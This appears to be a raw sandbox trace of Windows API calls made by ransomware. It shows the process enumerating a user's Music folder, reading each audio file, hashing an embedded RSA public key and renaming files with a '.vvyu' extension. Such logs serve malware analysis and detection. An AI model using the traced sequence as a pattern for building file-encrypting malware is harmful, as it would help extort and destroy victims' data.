[0186.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0186.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0186.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0186.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0186.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0186.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0186.986] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0186.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0186.987] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0186.987] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0186.987] CloseHandle (hObject=0x584) returned 1 [0186.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0186.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x870) returned 0x2d42908 [0186.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0186.989] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\Oolp hJaohuLco5czCDI.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\oolp hjaohulco5czcdi.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\Oolp hJaohuLco5czCDI.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\oolp hjaohulco5czcdi.mp3.vvyu")) returned 1 [0186.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0186.994] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0186.994] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0186.997] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x734c7310, ftCreationTime.dwHighDateTime=0x1d898cc, ftLastAccessTime.dwLowDateTime=0xab57b2a0, ftLastAccessTime.dwHighDateTime=0x1d8a31d, ftLastWriteTime.dwLowDateTime=0xab57b2a0, ftLastWriteTime.dwHighDateTime=0x1d8a31d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pE 0cUon", cAlternateFileName="PE0CUO~1")) returned 1 [0186.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0186.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0186.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82c18 [0186.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0186.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0186.997] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x574d19f0, ftCreationTime.dwHighDateTime=0x1d89861, ftLastAccessTime.dwLowDateTime=0x979ccc90, ftLastAccessTime.dwHighDateTime=0x1d8a23d, ftLastWriteTime.dwLowDateTime=0x979ccc90, ftLastWriteTime.dwHighDateTime=0x1d8a23d, nFileSizeHigh=0x0, nFileSizeLow=0x10e2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qxLG6rlRsvYEmXiL.m4a", cAlternateFileName="QXLG6R~1.M4A")) returned 1 [0186.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d389e8 [0186.997] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0186.998] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d389e8 | out: hHeap=0x6a0000) returned 1 [0186.998] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\qxLG6rlRsvYEmXiL.m4a") returned=".m4a" [0186.998] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\qxLG6rlRsvYEmXiL.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\qxlg6rlrsvyemxil.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0186.999] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=69167) returned 1 [0186.999] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0187.001] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10e09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.001] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0187.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.003] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.003] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.003] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x10e2f, lpOverlapped=0x0) returned 1 [0187.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.006] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0187.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.006] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.006] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0187.007] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0187.007] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.007] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0187.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0187.007] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0187.007] GetLastError () returned 0x0 [0187.007] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0187.007] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0187.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0187.008] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0187.008] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0187.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.008] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0187.008] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e30) returned 0x2d43778 [0187.009] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0187.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0187.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0187.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0187.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d389e8 [0187.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eaf8 [0187.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38a30 [0187.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4eae0 [0187.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0187.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0187.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396a0 [0187.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0187.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2d31688 [0187.010] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2d31688, Size=0x218) returned 0x2d3bb48 [0187.010] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0187.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0187.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0187.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0187.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378c0 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39688 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d396a0 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37830 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0187.011] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0187.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0187.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396a0 | out: hHeap=0x6a0000) returned 1 [0187.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0187.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0187.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0187.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0187.013] GetCurrentThreadId () returned 0x264 [0187.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0187.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d377f8 [0187.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84d30 [0187.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0187.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2c84da8 [0187.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0187.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0187.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.014] GetCurrentThreadId () returned 0x264 [0187.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.014] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.014] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0187.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0187.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0187.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0187.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c827f8 [0187.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x6dc8f8 [0187.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39688 [0187.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0187.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0187.016] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396a0 [0187.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0187.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396b8 [0187.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d396d0 [0187.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0187.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d396e8 [0187.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39700 [0187.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.017] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39718 [0187.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39700 | out: hHeap=0x6a0000) returned 1 [0187.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39700 [0187.018] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d396e8 | out: hHeap=0x6a0000) returned 1 [0187.018] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0187.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0187.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0187.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39688 [0187.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d2fc98 [0187.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8f8 | out: hHeap=0x6a0000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0187.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39718 | out: hHeap=0x6a0000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d42908 [0187.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x74ad40 [0187.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0187.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39688 | out: hHeap=0x6a0000) returned 1 [0187.019] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d42b20 [0187.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0187.020] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0187.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0187.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0187.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0187.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0187.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0187.021] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0187.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42b20 | out: hHeap=0x6a0000) returned 1 [0187.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0187.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0187.022] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39700 | out: hHeap=0x6a0000) returned 1 [0187.022] 